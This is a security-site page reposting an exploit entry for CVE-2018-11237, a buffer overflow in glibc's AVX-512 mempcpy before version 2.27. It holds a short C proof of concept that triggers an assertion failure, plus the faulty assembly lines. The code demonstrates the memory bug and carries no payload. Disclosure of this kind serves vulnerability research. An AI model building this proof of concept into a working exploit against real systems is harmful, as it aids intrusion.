首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GNU glibc < 2.27 - Local Buffer Overflow
来源:http://jameelnabbo.com 作者:Nabbo 发布时间:2018-05-28  

# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: http://www.gnu.org/ <http://www.gnu.org/>
# CVE: CVE-2018-11237


# POC:

$ cat mempcpy.c
#define _GNU_SOURCE 1
#include <string.h>
#include <assert.h>

#define N 97699
char a[N];
char b[N+128];

int
main (void)
{
  memset (a, 'x', N);
  char *c = mempcpy (b, a, N);
  assert (*c == 0);
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.

The problem is these two lines in memmove-avx512-no-vzeroupper.S:

 vmovups %zmm4, (%rax)
 vmovups %zmm5, 0x40(%rax)

For mempcpy, %rax points to the end of the buffer.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Microsoft Internet Explorer 11
·SAP Internet Transaction Serve
·Siemens SCALANCE S613 - Remote
·FTPShell Server 6.80 - Denial
·FTPShell Server 6.80 - Buffer
·Linux 4.4.0 < 4.4.0-53 - AF_PA
·AMD / ARM / Intel - Speculativ
·Microsoft Edge Chakra JIT - Ma
·Siemens SIMATIC S7-1500 CPU -
·Adobe Experience Manager (AEM)
·R 3.4.4 - Local Buffer Overflo
·Linux 2.6.30 < 2.6.36-rc8 - Re
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved